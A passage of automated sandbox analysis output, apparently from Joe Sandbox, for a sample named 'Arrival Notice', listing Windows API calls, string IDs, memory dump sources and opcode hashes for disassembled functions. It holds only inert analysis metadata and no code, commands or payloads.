                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$ModeObjectStockText
                  • String ID:
                  • API String ID: 4037423528-0
                  • Opcode ID: f6ecdc5c4fadf559a95904fa525c19e45e0b4b8b4357aacf0831acce4e7a6a1d
                  • Instruction ID: 947555c1834e5d29c6a72ca00af1b4168b1b3d30ed008e04df4955449073627a
                  • Opcode Fuzzy Hash: f6ecdc5c4fadf559a95904fa525c19e45e0b4b8b4357aacf0831acce4e7a6a1d
                  • Instruction Fuzzy Hash: 7AE06D35645280AAEB615B74AC49BE93F20AB16336F08822AF6FAA80E1C77156409F15
                  APIs
                  • GetCurrentThread.KERNEL32 ref: 00411634
                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,004111D9), ref: 0041163B
                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004111D9), ref: 00411648
                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,004111D9), ref: 0041164F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CurrentOpenProcessThreadToken
                  • String ID:
                  • API String ID: 3974789173-0
                  • Opcode ID: c9b08777db38089fd4b3cdb26b803d8cdf5b6760ce6afd0d8ca3db090257209f
                  • Instruction ID: df22b63f708e1ace97a271780b6bc4a5d7edb851701630e73835236ca25e7665
                  • Opcode Fuzzy Hash: c9b08777db38089fd4b3cdb26b803d8cdf5b6760ce6afd0d8ca3db090257209f
                  • Instruction Fuzzy Hash: 69E08635603211DBD7B01FE09D4DB873B7CAF567D1F184829F746C90A0DA784480CB98
                  APIs
                  • GetDesktopWindow.USER32 ref: 0040D858
                  • GetDC.USER32(00000000), ref: 0040D862
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0040D882
                  • ReleaseDC.USER32(?), ref: 0040D8A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: 3e09f71f57b052ec6dc26828db4eebb31d8eb9d0c954271ad97e847bdfc366a4
                  • Instruction ID: f7d7f422bcd9922e7c332ea9d5299ffecb1caee43761c75a6e0714cb7b412032
                  • Opcode Fuzzy Hash: 3e09f71f57b052ec6dc26828db4eebb31d8eb9d0c954271ad97e847bdfc366a4
                  • Instruction Fuzzy Hash: 3DE01275801204DFCB919FE0D848A6DBBB5FB09310F15D069F806E7250CB3849029F44
                  APIs
                  • GetDesktopWindow.USER32 ref: 0040D86C
                  • GetDC.USER32(00000000), ref: 0040D876
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0040D882
                  • ReleaseDC.USER32(?), ref: 0040D8A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: 4332353670b8da1c4bfab3ef3aba947c43dcd66343f85549bae6bd1e68742fe4
                  • Instruction ID: 4f1cf93a8abd32487a6799fe9d7babdcb0ebb0ddfd837361c192aa5d9754644f
                  • Opcode Fuzzy Hash: 4332353670b8da1c4bfab3ef3aba947c43dcd66343f85549bae6bd1e68742fe4
                  • Instruction Fuzzy Hash: E4E04F78C01200DFCF919FA0D84C66DBBB5FB08310F199068F906E7260CB3859029F44
                  APIs
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00424ED4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Connection_wcslen
                  • String ID: *$LPT
                  • API String ID: 1725874428-3443410124
                  • Opcode ID: d08e6698b268c1b1de5f182fc09b8aca189b7785663d47c4495638fc2f5fa366
                  • Instruction ID: e0e7a12d1a7158edb8775b9e7d79424e90ef94f36657e469fbb257259cbee649
                  • Opcode Fuzzy Hash: d08e6698b268c1b1de5f182fc09b8aca189b7785663d47c4495638fc2f5fa366
                  • Instruction Fuzzy Hash: 1591D275A002149FCB14DF54D580EAABBF1FF84308F59809AE40A9F7A2C735ED85CB95
                  APIs
                  • __startOneArgErrorHandling.LIBCMT ref: 003DE30D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorHandling__start
                  • String ID: pow
                  • API String ID: 3213639722-2276729525
                  • Opcode ID: 1694476fbc1cb30825190e26dc82832464ba57aad0ac568c431f013ea326610b
                  • Instruction ID: f0f33a80e1e0ff7aad2f0c23fc359726c0a32c91ff9602ee287eebbbcdd582f1
                  • Opcode Fuzzy Hash: 1694476fbc1cb30825190e26dc82832464ba57aad0ac568c431f013ea326610b
                  • Instruction Fuzzy Hash: 6C518063A0C242D6CB177715ED013BA3FA8EB40741F354FAAE0D54A3E9EB348C959A46
                  APIs
                  • CharUpperBuffW.USER32(0040569E,00000000,?,0044CC08,?,00000000,00000000), ref: 004378DD
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • CharUpperBuffW.USER32(0040569E,00000000,?,0044CC08,00000000,?,00000000,00000000), ref: 0043783B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BuffCharUpper$_wcslen
                  • String ID: <sG
                  • API String ID: 3544283678-1050295264
                  • Opcode ID: c2d1e4d1b8b516ca947283a641b5156fe14014e7b411e8537db9d73a2695b10b
                  • Instruction ID: 9fe0dfd1fb9c4d5e659e08563d658f213539c9e11900d83ab0899e6adce3f2bb
                  • Opcode Fuzzy Hash: c2d1e4d1b8b516ca947283a641b5156fe14014e7b411e8537db9d73a2695b10b
                  • Instruction Fuzzy Hash: E16171B6914118EACF16FBA4CC91EFEB3B4BF18304F545126F642BB151EF285A05CBA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: #
                  • API String ID: 0-1885708031
                  • Opcode ID: 63f47d6872717ee27082d8f5eeb9b1f7765c7c60c79f1616360788abfc09bad6
                  • Instruction ID: a90e83f4d04e4d7070c43c42b97e420206767e12f8789e0ebacbd34c9a1de58f
                  • Opcode Fuzzy Hash: 63f47d6872717ee27082d8f5eeb9b1f7765c7c60c79f1616360788abfc09bad6
                  • Instruction Fuzzy Hash: 8C513636500246DFDB16EF25C081BFA7BA8EF15310F24486AEC91EB2D0D7389D52CB55
                  APIs
                  • Sleep.KERNEL32(00000000), ref: 003CF2A2
                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 003CF2BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: GlobalMemorySleepStatus
                  • String ID: @
                  • API String ID: 2783356886-2766056989
                  • Opcode ID: 2fee00b0d15564182be6db4a5720c51d249d3018f122003df6d24cc8b322cd92
                  • Instruction ID: bfb375b60aa4a0ea9cad1a3b7a591beaf9dde7ee0f8969a6d67a51f67d8e7d3e
                  • Opcode Fuzzy Hash: 2fee00b0d15564182be6db4a5720c51d249d3018f122003df6d24cc8b322cd92
                  • Instruction Fuzzy Hash: 805135714187449BD321AF10DC86BAFBBF8FB84708F81885DF2D9851A5EB708529CB67
                  APIs
                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004357E0
                  • _wcslen.LIBCMT ref: 004357EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BuffCharUpper_wcslen
                  • String ID: CALLARGARRAY
                  • API String ID: 157775604-1150593374
                  • Opcode ID: 220cee7ad23ae80b1430b1e420f96b36a2bb5db06ad8091106651a87d21c85fa
                  • Instruction ID: f80ec9d5e367b4c9e6fffeb5711a1b7f93bd6f93e2c96419de7c0ac17d4d8aa7
                  • Opcode Fuzzy Hash: 220cee7ad23ae80b1430b1e420f96b36a2bb5db06ad8091106651a87d21c85fa
                  • Instruction Fuzzy Hash: 5941A131A002099FCB18EFA9C8819FEBBB5EF59314F14506EE505AB351E7389D81CB94
                  APIs
                  • _wcslen.LIBCMT ref: 0042D130
                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0042D13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CrackInternet_wcslen
                  • String ID: |
                  • API String ID: 596671847-2343686810
                  • Opcode ID: 9b4be7decc359f3ae970fda2941830ba859496008d7e9d3a8628b03833d646ad
                  • Instruction ID: 340c529b118116b8903075c5f721a1572a58d39e9ae80a642ee46f1dc73c461b
                  • Opcode Fuzzy Hash: 9b4be7decc359f3ae970fda2941830ba859496008d7e9d3a8628b03833d646ad
                  • Instruction Fuzzy Hash: DB313E75D00219ABCF15EFA4DD85AEF7FB9FF04304F10001AF915AA262D735A916CB54
                  APIs
                  • DestroyWindow.USER32(?,?,?,?), ref: 00443621
                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0044365C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$DestroyMove
                  • String ID: static
                  • API String ID: 2139405536-2160076837
                  • Opcode ID: 311d67e8db6191f34074a64da147c25a27ed595a6cfc6e57fa8d486c2a2f6e45
                  • Instruction ID: b9ce9af34ebb4af0d4c340d4d17eb70bb7ccec0aadcd5e24de4f4c0d06f0f0fa
                  • Opcode Fuzzy Hash: 311d67e8db6191f34074a64da147c25a27ed595a6cfc6e57fa8d486c2a2f6e45
                  • Instruction Fuzzy Hash: 9731A171100204AAEB20DF24DC81EFB73A9FF48B24F01861EF9A597280DA34AD81C768
                  APIs
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044461F
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00444634
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: '
                  • API String ID: 3850602802-1997036262
                  • Opcode ID: 95f821a54266887f8c420861665a39bd5af0a2fe5a14a3750483768ac855abb7
                  • Instruction ID: 36686762512fc47741a04032cd829636dedf50c771dfc034ceab03e8603ec0a9
                  • Opcode Fuzzy Hash: 95f821a54266887f8c420861665a39bd5af0a2fe5a14a3750483768ac855abb7
                  • Instruction Fuzzy Hash: 8A314C74A01309AFEF14CFA9C981BDA7BB5FF49300F15406AEA04AB391D774A941CF94
                  APIs
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0044327C
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00443287
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: Combobox
                  • API String ID: 3850602802-2096851135
                  • Opcode ID: 6ac7e8860dfd47fbce6669a46857bc594570555974097cdb5173a53474234172
                  • Instruction ID: 5c9b8e89763f6890a008480c2a3edf4f4b2d1eba25170eca29da98e709aa2ac6
                  • Opcode Fuzzy Hash: 6ac7e8860dfd47fbce6669a46857bc594570555974097cdb5173a53474234172
                  • Instruction Fuzzy Hash: DF11E2713002087FFF219F94DC81EBB376AFB947A5F10412AF91897290D6B99D518764
                  APIs
                    • Part of subcall function 003B600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003B604C
                    • Part of subcall function 003B600E: GetStockObject.GDI32(00000011), ref: 003B6060
                    • Part of subcall function 003B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 003B606A
                  • GetWindowRect.USER32(00000000,?), ref: 0044377A
                  • GetSysColor.USER32(00000012), ref: 00443794
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                  • String ID: static
                  • API String ID: 1983116058-2160076837
                  • Opcode ID: 61a656c21413a791fe2d9a1564f39af89eca78b8ab349c7f0d2a906206f7022e
                  • Instruction ID: 168d44682bc386deac8787b2d834630d65310f24611236d89037d06c4612018c
                  • Opcode Fuzzy Hash: 61a656c21413a791fe2d9a1564f39af89eca78b8ab349c7f0d2a906206f7022e
                  • Instruction Fuzzy Hash: 78112CB2610209AFEB01DFA8CC46EEE7BB8EB09715F004525F995E2250D739E8519B54
                  APIs
                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0042CD7D
                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0042CDA6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Internet$OpenOption
                  • String ID: <local>
                  • API String ID: 942729171-4266983199
                  • Opcode ID: b2f34c750dfc56c2c7dbdae7998c073c16e8af1cf9069fd0b742d9057eb0f00b
                  • Instruction ID: cd4e5e2a3cead890851a6d8bdcd305374b148d713963dc245505c5b4256268d4
                  • Opcode Fuzzy Hash: b2f34c750dfc56c2c7dbdae7998c073c16e8af1cf9069fd0b742d9057eb0f00b
                  • Instruction Fuzzy Hash: 3F11E3753616327AD7244B669CC4EEBBE68EB127A4F804237B10983180D2689845D6F4
                  APIs
                  • GetWindowTextLengthW.USER32(00000000), ref: 004434AB
                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004434BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LengthMessageSendTextWindow
                  • String ID: edit
                  • API String ID: 2978978980-2167791130
                  • Opcode ID: 7acb5f156cfd8bed2198edba00d29d4fc220d8ff3990979a8a96e540dd202423
                  • Instruction ID: 60f7453e20076353dd9be38e7ad67c3b0c0ca9d911aa5597fba7ab372f0583a5
                  • Opcode Fuzzy Hash: 7acb5f156cfd8bed2198edba00d29d4fc220d8ff3990979a8a96e540dd202423
                  • Instruction Fuzzy Hash: 1B11BF71100108ABFB125F64DC81AEB376AEB15B79F504326F960932E0C739EC519B58
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • CharUpperBuffW.USER32(?,?,?), ref: 00416CB6
                  • _wcslen.LIBCMT ref: 00416CC2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: STOP
                  • API String ID: 1256254125-2411985666
                  • Opcode ID: 341ee724b5df8aefc0a6919478739d3c78a67be76189df76a1a4d7e4750bf402
                  • Instruction ID: 14d4e74b2d98c9eb313fd50e1204dafbc95d4d2bedb214f35f44c5ec8c0ffab9
                  • Opcode Fuzzy Hash: 341ee724b5df8aefc0a6919478739d3c78a67be76189df76a1a4d7e4750bf402
                  • Instruction Fuzzy Hash: 2301D6326005268BCB219FBDEC809FF77B5EB61714752053AE95297290FB39D980C794
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00411D4C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 2932b75fa65586d6a7e5b068a48d2ecc1ee6f252657d0041592b4275c55bc1ed
                  • Instruction ID: f898bacced81f3e63f6cb34e8c32d067f6b14de5dbca33f38951602cbda1bbd0
                  • Opcode Fuzzy Hash: 2932b75fa65586d6a7e5b068a48d2ecc1ee6f252657d0041592b4275c55bc1ed
                  • Instruction Fuzzy Hash: 15012831601218AB8B04EFA0DC51DFF7768EB02354B14051BFA265B3D1EA346948C664
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00411C46
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 141d3989d7bd64bf321faa2cf96518d391581a487ecb3f6f779a2d0bcb2d67c5
                  • Instruction ID: 7cfe9e63b247c372d7ed675e95701c0c7d0979ee09c6b51b2451c6ab203c910e
